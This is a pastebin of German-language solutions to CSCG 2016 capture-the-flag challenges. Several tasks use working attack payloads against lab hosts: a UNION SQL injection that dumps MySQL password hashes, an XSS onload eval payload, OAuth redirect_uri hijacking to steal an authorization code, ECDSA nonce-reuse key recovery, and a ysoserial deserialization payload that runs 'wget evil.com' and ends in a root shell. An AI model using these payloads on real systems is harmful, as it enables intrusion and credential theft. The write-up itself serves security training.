Guest User

itsumade cscg 2016

a guest
Aug 28th, 2016
386
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.79 KB | None | 0 0
  1. 5215 wordpressplugger ------------:
  2.  
  3. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1
  4. -> Liefert das Ergebnis von Kalender id 1.
  5. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2
  6. -> Liefert kein Ergebnis
  7. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2-1
  8. -> Liefert wiederum Ergebnis von id 1.
  9.  
  10. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1/**/ORDER/**/BY/**/14
  11. -> Liefert id 1.
  12.  
  13. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,count(user),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
  14. -> Zeigt im "Subject"-Feld eine 6. Also existieren 6 Eintraege:
  15.  
  16. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,group_concat(user,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
  17. -> root:*09753075E6FEF0002CC255046396E59A1ED19BB1,
  18. <selber eintrag>
  19. <selber eintrag>
  20. <selber eintrag>
  21. debian-sys-maint:*6ABC3CC789E7C360B292AF4FE1DF816C2C53488D,
  22. wpuser:*C9B2DB1CA193280B971CA3602D5174A5D637D2BF
  23.  
  24. Patch: + $_GET["id"] = intval($_GET["id"]);
  25.  
  26. 5212 Hello my name is ------------:
  27.  
  28. http://348bc741d2dc.i.hacking-lab.com/card.php?name=Yolo&size=467" onload="eval(document.location.hash.slice(1))">#alert(1337)
  29. Patch: $size = htmlspecialchars($_GET['size'], ENT_QUOTES);
  30.  
  31. 7550 Princess in Distress ------------:
  32.  
  33. #!/usr/bin/perl
  34. open F, '<', 'input.html';
  35. do {
  36. local $/;
  37. $content = <F>;
  38. };
  39. close F;
  40.  
  41. $content =~ s/\s/|/g;
  42. $content =~ s/[^|]+/ /g;
  43.  
  44. $binary = '';
  45. for (split / /, $content) {
  46. $binary .= '0' if $_ eq '|';
  47. $binary .= '1' if $_ eq '||';
  48. }
  49.  
  50. print pack 'B*', $binary;
  51.  
  52. Ausgabe: What is a man? A miserable little pile of secrets: \x89PNG^M...
  53.  
  54. $ file output
  55. output: PNG image data, 320 x 224, 8-bit/color RGB, non-interlaced
  56.  
  57. #!/usr/bin/perl
  58. use GD;
  59.  
  60. $img = GD::Image->new('output.png');
  61.  
  62. $binary = '';
  63. for $y (0 .. 6) {
  64. for $x (0 .. 319) {
  65. ($r, $g, $b) = $img->rgb($img->getPixel($x, $y));
  66. $binary .= '0' if $r > 80;
  67. $binary .= '1' if $r < 80;
  68. }
  69. }
  70.  
  71. print pack 'B*', $binary;
  72.  
  73. Ausgabe:
  74.  
  75. This is not the file you're looking for... *jedi gesture*
  76. If you look carefuly, sometimes a file can hide another..
  77.  
  78. By the way, should you stumble upon a locked chest during
  79. your quest, this key will have it opened, once unciphered
  80. with the magic number of 1337:
  81.  
  82. BQRAIHUJBVWSF
  83.  
  84. Gronsfeld Verschluesselung:
  85. "BQRAIHUJBVWSF" entschluesselt mit Key "1337" ergibt: "ANOTHERCASTLE".
  86.  
  87. $ binwalk output
  88.  
  89. DECIMAL HEXADECIMAL DESCRIPTION
  90. --------------------------------------------------------------------------------
  91. 51 0x33 PNG image, 320 x 224, 8-bit/color RGB, non-interlaced
  92. 92 0x5C Zlib compressed data, default compression, uncompressed size >= 215264
  93. 3450 0xD7A PNG image, 256 x 224, 8-bit/color RGB, non-interlaced
  94. 3491 0xDA3 Zlib compressed data, default compression, uncompressed size >= 172256
  95.  
  96. $ 7z e out.zip -y -pANOTHERCASTLE
  97. $ file mario.xm
  98. mario.xm: Fasttracker II module sound data Title: "super mario brothers\032FastTracker v2.00 \004\001\024\001"
  99. $ strings mario.xm
  100. ...
  101. IFOUNDTHEPRINCESS
  102. greenbass:mel-o-d/hbe
  103. I hope you had fun!
  104. ------------- Tenchi
  105.  
  106. 7554 Binary Tricks ------------:
  107. $ ltrace ./houdini.bin
  108. __libc_start_main(0x40078a, 1, 0x7fff42d88e28, 0x400930 <unfinished ...>
  109. getenv("ADMIN")
  110. atoi(0x7fff42d89fd6, 0x7fff42d88cf2, 3, 2)
  111. setenv("ADMIN", "-1", 1)
  112. printf("What did you expect?")
  113. ...
  114.  
  115. 0x00000000004006fe <+142>: movzbl 0x200713(%rip),%eax # 0x600e18 == 'A'
  116. 0x0000000000400705 <+149>: mov %al,-0x10(%rbp)
  117. 0x0000000000400708 <+152>: movzbl 0x200703(%rip),%eax # 0x600e12 == 'D'
  118. 0x000000000040070f <+159>: mov %al,-0xf(%rbp)
  119. 0x0000000000400712 <+162>: movzbl 0x2006fb(%rip),%eax # 0x600e14 == 'M'
  120. 0x0000000000400719 <+169>: mov %al,-0xe(%rbp)
  121. 0x000000000040071c <+172>: movzbl 0x2006f3(%rip),%eax # 0x600e16 == 'I'
  122. 0x0000000000400723 <+179>: mov %al,-0xd(%rbp)
  123. 0x0000000000400726 <+182>: movzbl 0x2006e3(%rip),%eax # 0x600e10 == 'N'
  124. 0x000000000040072d <+189>: mov %al,-0xc(%rbp)
  125. 0x0000000000400730 <+192>: movb $0x0,-0xb(%rbp)
  126. 0x0000000000400734 <+196>: lea -0x10(%rbp),%rax
  127. 0x0000000000400738 <+200>: mov %rax,%rdi
  128. 0x000000000040073b <+203>: callq 0x400560 <getenv@plt>
  129. 0x0000000000400740 <+208>: mov %rax,-0x8(%rbp)
  130. 0x0000000000400744 <+212>: cmpq $0x0,-0x8(%rbp)
  131. 0x0000000000400749 <+217>: je 0x400768 <register_tm_clones+248>
  132. 0x000000000040074b <+219>: mov -0x8(%rbp),%rax
  133. 0x000000000040074f <+223>: mov %rax,%rdi
  134. 0x0000000000400752 <+226>: callq 0x4005f0 <atoi@plt>
  135. 0x0000000000400757 <+231>: cmp $0x7ffffffa,%eax # atoi(getenv("ADMIN")) == 2147483642
  136.  
  137. hacker@096e684245c3:/opt/houdini$ ADMIN=2147483642 ./houdini.bin
  138. The flag is : {simsalabim /usr/bin !}
  139.  
  140. 4300 OAuth2 ------------:
  141.  
  142. redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
  143. -> Ok
  144. redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizex
  145. -> OAuth Error
  146. redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizedd
  147. -> Ok
  148. redirect_uri=httphttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
  149. -> Ok
  150.  
  151. Zunaechst den ersten Redirect mitschneiden, ihm aber nicht folgen:
  152. http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
  153.  
  154. Der Redirect Parameter wird nun wie folgt modifiziert:
  155. http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3a%2F%2Fmeine.domain.xxx%2f%3fxxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
  156.  
  157. Auf meine.domain.xxx sehen wir nun folgenden Request eintreffen:
  158. GET /?xxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg HTTP/1.1
  159. ...
  160. User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.10.0-327.13.1.el7.x86_64
  161.  
  162. code: h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
  163.  
  164. http://509876f5a784.i.hacking-lab.com/app1/authorized?next=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
  165.  
  166. Signed in as admin
  167. Gold nugget: k2PCyLoOXw-SWNbqsY4KUQNAtbBQVHqjOXcFGj8G
  168.  
  169. 7686 Breaking Elliptic Curve Cryptography ------------:
  170.  
  171. #!/usr/bin/perl
  172. use Crypt::PK::ECC;
  173. use Data::Dumper;
  174.  
  175. my $priv = Crypt::PK::ECC->new('private_key.pem');
  176. print Dumper($priv->key2hash);
  177.  
  178. Ausgabe:
  179.  
  180. $VAR1 = {
  181. 'size' => 24,
  182. 'curve_bytes' => 24,
  183. 'curve_name' => 'SECP192R1',
  184. 'curve_Gx' => '188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012',
  185. 'curve_B' => '64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1',
  186. 'curve_order' => 'FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831',
  187. 'curve_bits' => 192,
  188. 'k' => 'AC8577FF2504492E7CB6D5F8716D4C193728D8592B6F4225',
  189. 'curve_prime' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF',
  190. 'curve_A' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC',
  191. 'pub_x' => '1D590766F26A888B8C6C38E8A0ABDA1609B40955D1996620',
  192. 'curve_Gy' => '07192B95FFC8DA78631011ED6B24CDD573F977A11E794811',
  193. 'curve_cofactor' => 1,
  194. 'type' => 1,
  195. 'pub_y' => '8BD11F87E8F87AE0607F58BF68327DF2E5186D7D97F2C3F7'
  196. };
  197.  
  198. Standard NIST192p Kurve. Im Wireshark Dump sieht man die beiden Signaturen:
  199. sig = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvc1ilypdV4aDLRLIlVaCCkHsuN6EAet0 und sig2 = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvSvNuLoc421+3BZMMFukNTOztlpj9kf4e
  200. Aufgeteilt in (r, s) ist das
  201. (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e) und
  202. (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e)
  203.  
  204. #!/usr/bin/python
  205. from hashlib import sha1
  206. import base64
  207. from ecdsa import numbertheory
  208.  
  209. m1 = int(sha1("iSsuZJOq1FNKMuK4wm88UEkr21wgsypW").hexdigest(),16)
  210. m2 = int(sha1("x3wqOnaetBPO66TrBaMyr3NQIDbhvK0w").hexdigest(),16)
  211.  
  212. r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
  213. s1 = int("7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e", 16)
  214. r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
  215. s2 = int("4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e", 16)
  216. n = int("FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831", 16)
  217.  
  218. _k = (m1 - m2) * numbertheory.inverse_mod(s1 - s2, n) % n
  219. _d = (s1 * _k - m1) * numbertheory.inverse_mod(r1, n) % n
  220. print hex(_d)
  221.  
  222. Ausgabe: 0x2f3c25b19905c1c0c5a75507064b94289c0b7064b16e2c31L
  223.  
  224. #!/usr/bin/python
  225. from ecdsa import SigningKey
  226. from ecdsa import NIST192p
  227. import base64
  228.  
  229. sk = SigningKey.from_pem(open("private_key.pem").read())
  230.  
  231. sk_new = sk.from_string("\x2f\x3c\x25\xb1\x99\x05\xc1\xc0\xc5\xa7\x55\x07\x06\x4b\x94\x28\x9c\x0b\x70\x64\xb1\x6e\x2c\x31", curve=NIST192p);
  232. message = "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4"
  233. sig = sk_new.sign(message)
  234. print base64.b64encode(sig)
  235.  
  236. Ausgabe:
  237. YKQBPvMtErS5rHvGKe1jXmETsKwFMWgnif0MxwwEnestC4+77wgS3H2RAbHf6Utd
  238.  
  239. Damit fuer die Nonce "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4" eingeloggt erhaelt man das Secret:
  240.  
  241. #This class will make everyone our slaves!
  242.  
  243. import evillib
  244. class EvilAlgorithm:
  245. def bad_function(self):
  246. evillib.evilyfy()
  247. print('Obey slaves!')
  248. evilness = "sooo evil!"
  249. return evilness
  250.  
  251. 5219 Rohde & Schwarz Cybersecurity-Challenge ------------:
  252. $ file hackme.beam
  253. hackme.beam: Erlang BEAM file
  254.  
  255. $ erl
  256. Erlang/OTP 17 [erts-6.2] [source] [64-bit] [smp:4:4] [async-threads:10] [kernel-poll:false]
  257.  
  258. Eshell V6.2 (abort with ^G)
  259. 1> io:format("~p~n",[beam_disasm:file("hackme.beam")]).
  260. {beam_file,hackme,
  261. [{module_info,0,4},{module_info,1,6},{start,0,2}],
  262. [{vsn,[284277428168876805194481449229875660789]}],
  263. [{options,[]},
  264. {version,"6.0"},
  265. {time,{2016,2,24,14,33,49}},
  266. {source,"/tmp/Untitled Folder/hackme.erl"}],
  267. [{function,start,0,2,
  268. [{label,1},
  269. {line,1},
  270. {func_info,{atom,hackme},{atom,start},0},
  271. {label,2},
  272. {allocate,0,0},
  273. {move,{literal,"'"},{x,1}},
  274. {move,{literal,"MuMuMuLoxkOtZnkNurk"},{x,0}},
  275. {line,2},
  276. {call_ext,2,{extfunc,string,concat,2}},
  277. {move,{literal,["Dpohsbut nbo! Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: "]},
  278. {x,1}},
  279. {move,{literal,"Lets beat erlang files!~n~p"},{x,0}},
  280. {line,3},
  281. {call_ext_last,2,{extfunc,io,format,2},0}]},
  282. {function,module_info,0,4,
  283. [{line,0},
  284. {label,3},
  285. {func_info,{atom,hackme},{atom,module_info},0},
  286. {label,4},
  287. {move,{atom,hackme},{x,0}},
  288. {line,0},
  289. {call_ext_only,1,{extfunc,erlang,get_module_info,1}}]},
  290. {function,module_info,1,6,
  291. [{line,0},
  292. {label,5},
  293. {func_info,{atom,hackme},{atom,module_info},1},
  294. {label,6},
  295. {move,{x,0},{x,1}},
  296. {move,{atom,hackme},{x,0}},
  297. {line,0},
  298. {call_ext_only,2,
  299. {extfunc,erlang,get_module_info,2}}]}]}
  300. ok
  301. 2>
  302.  
  303. Verschluesselt: Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: MuMuMuLoxkOtZnkNurk
  304. Entschluesselt: You figured out how to beat erlang beam files. Here is the flag: GoGoGoFireInTheHole
  305.  
  306. 7685 Why so serious ------------:
  307.  
  308. Login:
  309.  
  310. URL loginUrl = new URL(AcmeClient.getServerUrl() + "/login");
  311.  
  312. String urlParameters = String.format("username=%s&password=%s", new Object[] { username, password });
  313. byte[] postData = urlParameters.getBytes(StandardCharsets.UTF_8);
  314. int postDataLength = postData.length;
  315. HttpURLConnection conn = (HttpURLConnection)loginUrl.openConnection();
  316. conn.setRequestMethod("POST");
  317. conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
  318. conn.setRequestProperty("Content-Length", Integer.toString(postData.length));
  319. conn.setRequestProperty("charset", "utf-8");
  320. conn.setUseCaches(false);
  321. conn.setInstanceFollowRedirects(false);
  322. conn.setDoOutput(true);
  323. DataOutputStream wr = new DataOutputStream(conn.getOutputStream());
  324. wr.write(postData);
  325.  
  326.  
  327. POST /acme-server//login HTTP/1.1
  328. Content-Type: application/x-www-form-urlencoded
  329. charset: utf-8
  330. Cache-Control: no-cache
  331. Pragma: no-cache
  332. User-Agent: Java/1.8.0_65
  333. Host: 6f00328f7dc4.i.hacking-lab.com
  334. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  335. Connection: keep-alive
  336. Content-Length: 32
  337.  
  338. username=johndoe&password=123456
  339.  
  340. Response:
  341.  
  342. HTTP/1.1 200 OK
  343. Server: Apache-Coyote/1.1
  344. Content-Type: text/xml;charset=ISO-8859-1
  345. Content-Length: 270
  346. Date: Fri, 01 Jul 2016 13:52:21 GMT
  347.  
  348. <?xml version="1.0"?>
  349. <access-control>
  350. <right id="11">false</right>
  351. <right id="134">true</right>
  352. <right id="13">true</right>
  353. <right id="291">true</right>
  354. <right id="1024">false</right>
  355. <right id="987">false</right>
  356. <right id="1337">true</right>
  357. </access-control>
  358.  
  359. private void jButton1ActionPerformed(ActionEvent evt)
  360. {
  361. RecordBean record = new RecordBean();
  362. record.setLastName(this.fieldLastName.getText());
  363. record.setFirstName(this.fieldFirstName.getText());
  364. record.setGender(this.fieldGender.getModel().getSelectedItem().toString());
  365. record.setEmail(this.fieldEmail.getText());
  366. try
  367. {
  368. URL url = new URL(AcmeClient.getServerUrl() + "/adddata");
  369. HttpURLConnection conn = (HttpURLConnection)url.openConnection();
  370. conn.setDoOutput(true);
  371. ObjectOutputStream oos = new ObjectOutputStream(conn.getOutputStream());
  372. oos.writeObject(record);
  373. oos.flush();
  374. oos.close();
  375. conn.getResponseCode();
  376. }
  377. catch (Exception e)
  378. {
  379. throw new RuntimeException(e);
  380. }
  381. }
  382. }
  383.  
  384.  
  385. POST /acme-server/adddata HTTP/1.1
  386. ...
  387. Response:
  388. ...
  389. <b>exception</b></p><pre>java.io.StreamCorruptedException: invalid stream header: 75736572
  390. java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:804)
  391. java.io.ObjectInputStream.&lt;init&gt;(ObjectInputStream.java:299)
  392. com.acme.server.AddDataServlet.processRequest(AddDataServlet.java:36)
  393. com.acme.server.AddDataServlet.doPost(AddDataServlet.java:71)
  394. javax.servlet.http.HttpServlet.service(HttpServlet.java:648)
  395. javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
  396. org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
  397.  
  398. $ java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'wget evil.com:8080/file -O /tmp/xxx' > stream.bin
  399.  
  400. POST /acme-server/adddata HTTP/1.1
  401. Content-Type: application/x-www-form-urlencoded
  402. charset: utf-8
  403. Cache-Control: no-cache
  404. Pragma: no-cache
  405. User-Agent: Java/1.8.0_65
  406. Host: b01ed7e7b10b.i.hacking-lab.com
  407. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  408. Connection: keep-alive
  409. Content-Length: 2078
  410.  
  411. ’...<Payload aus der Stream.bin>
  412.  
  413. $ nc -vlp 8080
  414. listening on [any] 8080 ...
  415. Warning: forward host lookup failed for host-246-102.compass-security.com:
  416. connect to [91.214.168.38] from host-246-102.compass-security.com [212.254.246.102] 42497
  417. id
  418. uid=0(root) gid=0(root) groups=0(root)
  419. ls -la
  420. total 124
  421. drwxr-sr-x. 10 root staff 4096 Jul 1 12:50 .
  422. drwxrwsr-x. 11 root staff 4096 Mar 15 22:15 ..
  423. -rw-r--r--. 1 root root 57011 Feb 2 19:39 LICENSE
  424. -rw-r--r--. 1 root root 1444 Feb 2 19:39 NOTICE
  425. -rw-r--r--. 1 root root 6741 Feb 2 19:39 RELEASE-NOTES
  426. -rw-r--r--. 1 root root 16195 Feb 2 19:39 RUNNING.txt
  427. drwxr-xr-x. 2 root root 4096 Mar 15 22:15 bin
  428. drwxr-xr-x. 3 root root 4096 Jul 1 12:50 conf
  429. drwxr-sr-x. 2 root staff 4096 Jul 1 12:50 dummy
  430. drwxr-xr-x. 2 root root 4096 Mar 15 22:15 lib
  431. drwxr-xr-x. 2 root root 4096 Jul 1 12:50 logs
  432. drwxr-xr-x. 2 root root 4096 Mar 15 22:15 temp
  433. drwxr-xr-x. 8 root root 4096 Jul 1 12:50 webapps
  434. drwxr-xr-x. 3 root root 4096 Jul 1 12:50 work
  435. cd /tmp
  436. ls
  437. goldnugget
  438. hsperfdata_root
  439. xxx
  440. cat goldnugget
  441. ZAhgt^L&NgTUWDwv577fY*A^G8y!EGUT
  442.  
  443. 5076 Listen Carefully ------------:
  444.  
  445. LSBs aus jeweils linken und rechtem Frame abwechseln:
  446.  
  447. #!/usr/bin/perl
  448. use Audio::SndFile;
  449.  
  450. $f = Audio::SndFile->open("<", "audio_file.wav");
  451. $ret = $f->read_short($buffer, $f->frames);
  452.  
  453. @values = unpack("S*", $buffer);
  454.  
  455. for (0 .. ~~@values - 1) {
  456. $left[$x++] = $values[$_] if $_ % 2 == 0;
  457. $right[$y++] = $values[$_] if $_ % 2 != 0;
  458. }
  459.  
  460. for (0 .. ~~@left - 1) {
  461. $str .= $left[$_] & 1 if $_ % 2 == 0;
  462. $str .= $right[$_] & 1 if $_ % 2 != 0;
  463. }
  464.  
  465. print substr pack('B*', $str), 0, 445;
  466.  
  467. $ perl solve.pl
  468. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Add Comment
Please, Sign In to add comment